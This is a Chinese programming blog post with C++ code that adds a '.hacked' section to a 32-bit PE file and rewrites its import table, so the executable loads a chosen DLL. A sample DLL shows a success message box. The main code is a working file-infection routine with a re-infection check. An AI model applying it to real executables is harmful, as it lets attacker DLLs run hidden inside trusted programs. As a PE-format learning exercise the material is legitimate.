代码实现增加PE文件节区+修改IID结构(静态干预输入表),成功加载用户DLL

最新推荐文章于 2024-05-28 10:57:11 发布
最新推荐文章于 2024-05-28 10:57:11 发布
阅读量641 收藏 2
点赞数
分类专栏: C/C++编程 文章标签: c++ exe windows
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_41890599/article/details/103715920
版权

运行结果图,在一个hello world程序运行之前,代码实现让其加载我们的一个DLL文件。
在这里插入图片描述
修改前后文件结构对比
在这里插入图片描述在这里插入图片描述
修改PE文件干预输入表的代码如下:

#include<stdio.h>
#include<windows.h>

void infecting(char *);//修改导入表
LPVOID rva2raw(PIMAGE_SECTION_HEADER,DWORD,WORD);//RVA转RAW
char dllname[]="mydll.dll";//要加入的DLL名称
char path[MAX_PATH] = "c:\\Users\\Admin\\Desktop\\hello.exe";//要修改的文件名称
void main()
{
	
	infecting(path);
}

void infecting(char * path)
{
	HANDLE hFile;
	HANDLE hFileMap;
	LPVOID mapView;
	hFile = CreateFileA(path,GENERIC_READ | GENERIC_WRITE,NULL,NULL,OPEN_EXISTING,FILE_ATTRIBUTE_NORMAL,NULL);//打开文件句柄
	if(hFile == INVALID_HANDLE_VALUE)
		return;
	hFileMap = CreateFileMapping(hFile,NULL,PAGE_READWRITE,NULL,0x1000,NULL);//创建文件映射对象
	if(hFileMap == NULL)
		return;
	mapView = (PCHAR)MapViewOfFile(hFileMap,FILE_MAP_ALL_ACCESS,NULL, NULL, NULL);//将文件映射到该进程
	if(mapView == NULL)
		return;
	PIMAGE_DOS_HEADER pDos = PIMAGE_DOS_HEADER(mapView);//指向dos头
	PIMAGE_NT_HEADERS pNt = PIMAGE_NT_HEADERS(pDos->e_lfanew+(DWORD)pDos);//指向NT头
	PIMAGE_FILE_HEADER pFile = PIMAGE_FILE_HEADER((BYTE *)pNt+4);//指向FILE头
	PIMAGE_OPTIONAL_HEADER pOpt = PIMAGE_OPTIONAL_HEADER(&pNt->OptionalHeader);//指向OPTIONAL头
	PIMAGE_SECTION_HEADER pSect = IMAGE_FIRST_SECTION(pNt);//指向section头

	//判断是否PE文件
	if(pDos->e_magic == 0x5A4D&&pNt->Signature == 0x4550)
	{
		//判断是否32为PE
		if(pOpt->Magic == 0x010B)
		{	
			//判断是否有签名
			if(!pOpt->DataDirectory[4].VirtualAddress||!pOpt->DataDirectory[4].Size)
			{
				//零填充绑定输入
				if( pOpt->DataDirectory[11].VirtualAddress)//判断绑定输入是否为空
				{	
					pOpt->DataDirectory[11].VirtualAddress = 0;
					pOpt->DataDirectory[11].Size =0;
						//0填充
				}
				//区块名,判断是否被感染
				if(strcmp((PCHAR)((pSect+pFile->NumberOfSections-1)->Name),".hacked"))
				{
				//添加节区
					PIMAGE_SECTION_HEADER pSectHack = &pSect[pFile->NumberOfSections];
					memcpy(pSectHack->Name,".hacked",8);
					//计算VA
					DWORD vasize;
					if(((pSect+pFile->NumberOfSections-1)->Misc.VirtualSize)%(pOpt->SectionAlignment))
						vasize = ((pSect+pFile->NumberOfSections-1)->Misc.VirtualSize)/(pOpt->SectionAlignment)+1;
					else
						vasize = ((pSect+pFile->NumberOfSections-1)->Misc.VirtualSize)/(pOpt->SectionAlignment);
					pSectHack->Misc.VirtualSize = vasize*(pOpt->SectionAlignment);//新节块的Virtualsize
					pSectHack->VirtualAddress = (pSect+pFile->NumberOfSections-1)->VirtualAddress+vasize*(pOpt->SectionAlignment);
					//计算新的rawsize
					DWORD rawsize;
					if((pOpt->DataDirectory[1].Size+0x14)%(pOpt->FileAlignment))
						rawsize = (pOpt->DataDirectory[1].Size+0x14)/(pOpt->FileAlignment)+1;
					else
						rawsize = (pOpt->DataDirectory[1].Size+0x14)/(pOpt->FileAlignment);//因为要加新的IID,所以加14
					pSectHack->SizeOfRawData = rawsize*(pOpt->FileAlignment);//新节块的rawsize
					pSectHack->PointerToRawData = (pSect+pFile->NumberOfSections-1)->PointerToRawData+(pSect+pFile->NumberOfSections-1)->SizeOfRawData;//计算区块偏移
					pSectHack->Characteristics = 0xC0000040;//可写对齐
					pSectHack->NumberOfRelocations = 0;//无需重定向
					pSectHack->NumberOfLinenumbers = 0;
					pSectHack->PointerToLinenumbers = 0;
					pSectHack->PointerToRelocations = 0;
				//干预输入表,备份输入表到新的节区,加入新IID
					LPCVOID buf = new BYTE[pSectHack->SizeOfRawData];//申请内存存放新IID结构
					PDWORD resize = new DWORD[1];//存储实际读入字节
					memset((PVOID)buf,0,pSectHack->SizeOfRawData);//内存初始化为0
					LONG IIDraw = (LONG)rva2raw(pSect,pOpt->DataDirectory[1].VirtualAddress,pFile->NumberOfSections);//原始IID的raw
					SetFilePointer(hFile,IIDraw,NULL,FILE_BEGIN);//文件指针指向IID数组
					ReadFile(hFile,(PVOID)buf,pOpt->DataDirectory[1].Size,resize,NULL);//将原始IID读入到申请的内存
					PIMAGE_IMPORT_DESCRIPTOR myIID = (PIMAGE_IMPORT_DESCRIPTOR)((BYTE *)buf+pOpt->DataDirectory[1].Size-0x14);//将原IID数组最后一项空IID声明为IID结构
					myIID->ForwarderChain=0;//无需转向
					myIID->TimeDateStamp=0;//忽略时间戳
				//找地址,写入新IID的各项内容,在这里我顺手反用了原始IID数组的地址
					PVOID oldiid = new BYTE*[pOpt->DataDirectory[1].Size];//清空原始IID数组
					memset(oldiid,0,pOpt->DataDirectory[1].Size);
					SetFilePointer(hFile,IIDraw,NULL,FILE_BEGIN);
					WriteFile(hFile,oldiid,pOpt->DataDirectory[1].Size,resize,NULL);
				//将原始IID数组改为新IID所需要的内容
					myIID->OriginalFirstThunk=pOpt->DataDirectory[1].VirtualAddress;//INT,指向原始IID数组位置
					LPVOID originalraw =rva2raw(pSect,pOpt->DataDirectory[1].VirtualAddress,pFile->NumberOfSections);//rva转raw,修改实际文件内容
					SetFilePointer(hFile,(LONG)originalraw,NULL,FILE_BEGIN);//文件指针指向新IID的originalFirstThunk
					DWORD iat =(pOpt->DataDirectory[1].VirtualAddress+0x20);//找地址存放IAT/INT
					WriteFile(hFile,&iat,sizeof(DWORD),resize,NULL);//将新区块指向INT的RVA地址写入,既写入original的内容
				//找地址,写入新IID的FirstTrunk
					myIID->FirstThunk=pOpt->DataDirectory[1].VirtualAddress+8;//,同样在原来IID数组找个位置填充IAT
					SetFilePointer(hFile,(LONG)originalraw+8,NULL,FILE_BEGIN);//文件指针指向新IID的FirstThunk
					WriteFile(hFile,&iat,sizeof(DWORD),resize,NULL);//将新区块指向INT的RVA地址写入,既写入Firsttrunk的内容
				//找地址,写入新IID的name的ascii
					myIID->Name=pOpt->DataDirectory[1].VirtualAddress+0x10;//RVA,同样在原来IID数组找个位置填充name
					SetFilePointer(hFile,(LONG)originalraw+0x10,NULL,FILE_BEGIN);//文件指针指向新IID的name
					WriteFile(hFile,dllname,sizeof(dllname),resize,NULL);//将字符串name写入
				//构建好IID结构内容与INA/IAT
					PVOID nop = new BYTE[2];//Hint,0填充
					memset(nop,0,sizeof(BYTE)*2);
					char funname[]="msg";
					SetFilePointer(hFile,(LONG)originalraw+0x20,NULL,FILE_BEGIN);//文件指针指向新IID的INT/IAT
					WriteFile(hFile,nop,sizeof(BYTE)*2,resize,NULL);
					WriteFile(hFile,funname,sizeof(funname),resize,NULL);//将IMAGE_IMPORT_BY_NAME写入
				//写入新区块
					SetFilePointer(hFile,pSectHack->PointerToRawData,NULL,FILE_BEGIN);//文件指针指向新区块开头
					WriteFile(hFile,buf,pSectHack->SizeOfRawData,resize,NULL);//将新区块内容写入文件
					pFile->NumberOfSections++;//节区数目加1
					pOpt->SizeOfImage += vasize*(pOpt->SectionAlignment);//修正Image大小
				//修改原始输入表信息
					pOpt->DataDirectory[1].Size += 0x14;
					pOpt->DataDirectory[1].VirtualAddress = pSectHack->VirtualAddress;
				}
			}
		}
	}

	UnmapViewOfFile(mapView);
	CloseHandle(hFileMap);
	CloseHandle(hFile);
}

LPVOID rva2raw(PIMAGE_SECTION_HEADER pSect,DWORD rva,WORD num)
{
	LPVOID offset=NULL;
	for(WORD i = 0;i<num;i++)
	{
		if(rva < (pSect->VirtualAddress+pSect->SizeOfRawData)&&rva > pSect->VirtualAddress)//遍历区块
		{
			offset =(LPVOID) (rva-( (pSect->VirtualAddress)-(pSect->PointerToRawData) ));//计算文件偏移
			return offset;
		}
		pSect++;
	}
	return offset;
}

一个简单的弹窗dll的实现代码如下:

#include<stdio.h>
#include<windows.h>
BOOL WINAPI DllMain(HANDLE hmoudle,DWORD call,LPVOID lpreser)
{
	switch(call)
	{
	case DLL_PROCESS_ATTACH:
		MessageBox(NULL,L"success!!!",L"注入成功",MB_OK);
	case DLL_THREAD_ATTACH:
	case DLL_THREAD_DETACH:
	case DLL_PROCESS_DETACH:
		break;
	}
	return true;
}
extern "C"_declspec(dllexport)void msg()
{
	MessageBox(NULL,L"success!!!",L"注入成功",MB_OK);
}

总结:在实际运行中,一部分程序无法修改或修改后无法正常运行,加载dll不稳定因素太多,如果有哪位大牛了解原因或BUG,还请告知一二。

yeanhoo
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【逆向工程笔记】第13章PE文件——给定一个exe文件,如何找到第一个IID文件
wuwuhe99的博客
05-31 484
第1个IID的函数地址列(76324906为文件的入口地址,不真实,要找内存的入口地址)在winhex里导航至6EAC,第1个IID的库名字 comdlg32.dll。WINHEX跳转至6EFA,找到库名字为SHELL32.dll。第1个IID:(从6A04向右数20个字,为下图黄色域)在PE中计算:RVA=00007AAC,RAW=6EAC。找到真正的入口地址,PE-数据目录-IAT-入口地址。WINHEX导航至6D90:(数40个字)打开Winhex,导航至6A04。
PE格式: 新建并插入DLL
CSDN
07-26 4790
PE格式是 Windows下最常用的可执行文件格式,理解PE文件格式不仅可以了解操作系统的流程,还可以更好的理解操作系统对进程和内存相关的管理知识,而有些技术必须建立在了解PE文件格式的基础上,如文件密与解密,病毒分析,外挂技术等。
PE文件并弹出简单的对话框
12-03
PE文件自动添,并弹出一个简单的对话框(可以自己修改成其它的东西)
如何从内存DLL
2401_84466224的博客
05-28 1064
文件格式通过在基本重定位中存储有关所有这些引用的信息来帮助实现此目的,这些信息可在OptionalHeader中的DataDirectory的目录条目5中找到。本教程的目的在于最大限度地唤醒大家对网络安全的重视,并采取相应的安全措施,从而减少由网络安全而带来的经济损失。相对于已分配内存块的基址的每个的目标地址存储在IMAGE_SECTION_HEADER结构的VirtualAddress属性中。PE 头包含有关可执行文件内不同部分的信息,这些信息用于存储代码和数据或定义从其他库导入或此库提供的导出。
PE结构详解(二)
bahunj93679的博客
01-21 133
那么继续上次未讲完的,我们先跳过导出,先讲讲导入。 首先,我们知道PE 文件中的数据被入内存后根据不同页面属性被划分成很多块(),并有)的数据来描述这些块。 这里我们需要注意的问题是:一个块中的数据仅仅只是由于属性相同而放在一起,并不一定是同一种用途的内容。 例如输入、输出等就有可能和只读常量一起被放在同一个块中...
重建 PE 文件输入 TiTi
xuplus的专栏
04-21 2403
标题:重建 PE 文件输入原著:TiTi/BLiZZARD 翻译:Sun Bird [CCG] 日期:2000年5月24日 1. 前言 ======= 大家好 :) 我之所以写这篇短文,是由于我在 Dump 时发现,很多压、密软件都使得输入(Import Table)不可用,所以 Dump 出的可执行文件必须要重建输入。而在普通的讲授 Win32 汇编的站点上我没有
PE文件格式详解
钞sir的博客
03-17 1万+
三千风雨三千雪 三千风雪我在写 流了一共三千血 你却始终不了解 简介 PE文件使用的是一个平面地址空间,所有的代码和数据都合并在一起,组成了一个很大的结构文件被分为不同的块(Section,又成为段或等),块中包含代码和数据,各个块按页边界对齐; 块没有大小限制,是一个连续结构;每一个块都有其自己的属性,如是否包含代码,是否可读可写等; PE文件的构成 MS-DOS头部 每个...
PE 输入 解析 python
11-03
PE文件头可选映像头中数据目录的第二成员指向输入输入以一个 IAMGE_IMPORT_DESCRITPTOR 数组开始,每个被PE文件隐式地链接进来的DLL都有一个IID,在这个数组中没有字段指出该结构数组的项数,但他最后一个...
簇联邦学习改进python实现源码+项目说明+代码注释(提高精度+缓解用户孤立问题).zip
最新发布
06-25
簇联邦学习改进python实现源码+项目说明+代码注释(提高精度+缓解用户孤立问题).zip 【1】项目代码完整且功能都验证ok,确保稳定可靠运行后才上传。欢迎下使用!在使用过程中,如有问题或建议,请及时私信沟通,...
易语言调用TTS语音模块实现文字转换语音功能的代码
12-01
为了实现更复杂的功能,如控制语音的音量、语速、暂停和恢复播放等,我们需要进一步学习和掌握易语言中与SAPI相关的命令和结构。同时,也可以探索第三方TTS库,如Nuance的TTS SDK,它们通常提供更丰富、更精细的控制...
asp代码实现检测组件是否安装的函数
10-30
在ASP(Active Server Pages)开发中,有时我们需要确保用户的服务器环境已经正确安装了特定的组件,以便我们的应用程序能够正常运行。`asp代码实现检测组件是否安装的函数`就是解决这个问题的一种方法。通过编写一个...
PE文件结构(二)-输入实例分析
ReverseBoy的专栏
04-21 882
输入分析实例: IIDIID数组:空间大小为14*2+14=3C OriginalFirstThunk TimeDateStamp ForwardChain Name FirstThunk 0000 C570 0000 0000  0000 0000 0000 C6C4
PE增加,并插入自己代码
windows小菜鸡的博客
08-15 1305
PE文件的基础知识大家可以自行百度。 1、在PE中末尾添一个PE末尾中添一个,需要注意: (1)RVA和FOA的转换 (2)需要修改SizeofImage的大小 (3)需要修改PE头中的数量 (4)如果现有的后面添的空间不足,可以移动NT头和 (5)新增加的属性根据自己的需要修改 (6)新增的RVA 需要注意计算,需要计算上一个RVA对齐后的尺寸 计算公式如下: //计算内存中对齐的大小 DWORD VirtulaSize = NULL; if (secti
PE文件格式分析
Onlyone_1314的博客
03-18 1064
PE文件格式一、MS-DOS头部DOS MZ头看个实例:DOS Stub看个实例:![在这里插入图片描述](https://img-blog.csdnimg.cn/20210317235647921.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L09ubHlvbmVfMTMxNA==,size_16,color_FFFFFF,t_70)二、PE文件
代码代码编程实现
hambaga的博客
05-12 763
原理 分析PE结构,找到第一个,假设它是代码(后面的实验都是基于这个前提),获取其内存偏移 VirtualAddress,计算它最后一条指令的偏移的下一个字,作为代码插入点。插入调用MessageBoxA的硬编码,和jmp到原入口点的代码。跳转地址计算公式是:X = 要跳转的地址 - 下一条指令的地址。要注意,公式中涉及的“地址”指的都是运行时的地址,即通过 [ImageBase + 偏移] 得到。 修改程序入口点,使运行时先执行我插入的代码,然后跳转到原来的入口点。 代码使用vc6开发,如果要迁移到
PE文件注入
zjc的博客
04-14 916
PE文件注入shellcode、实现弹出计算器 实验环境及要求 win10(地址随机化)、 32为exe(dll尚未尝试、理论上是可行的) 实现功能 地址自定位的弹出计算器的shellcode 注入PE、打开PE是弹出计算器 PE本身功能完整性 实验思路 解决shellcode地址定位的问题(使用PEB解决) 修好PE、添新的 修改的内容、新的首部注入shellcode 修改P...
PE文件结构(一)
weixin_34265814的博客
04-19 77
一. PE文件结构图 二. DOS 头部 其中最后一个字段DWORD e_lfanew;的值为PE文件头的相对偏移地址(RVA); 三.PE文件结构体的定义:IMAGE_NT_HEADERS:左边地址为相对PE文件头地址的偏移量。 DWORD Signature:PE文件头标识,一般其值...
Dll注入--修改PE文件
热门推荐
王二娃的生活的博客
06-25 1万+
DLL注入,除了常见的远线程注入,挂钩和修改注册以外还可以通过修改PE文件头来达到注入目的,废话少说先上菜。1. 思路PE文件经常会调用外部DLL文件,而需要调用的DLL文件都会在PE文件说明,通过 NT头->可选头->导入 可以找到导入,而导入就是对需要导入的每个DLL的说明,它实际上是一个20个字组成的IID结构体数组,每个结构体就是一个DLL信息说明,我们只需要想PE文件中准确添
Arcengine保存文件click具体实现代码
05-30
以下是使用ArcEngine保存文件的具体实现代码,其中pMapControl为IMapControl接口的指针,保存的文件格式可以根据需求设定。 ```c++ // 获取IMapControl接口 IMapControl3* pMapControl = NULL; pMapControl = ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值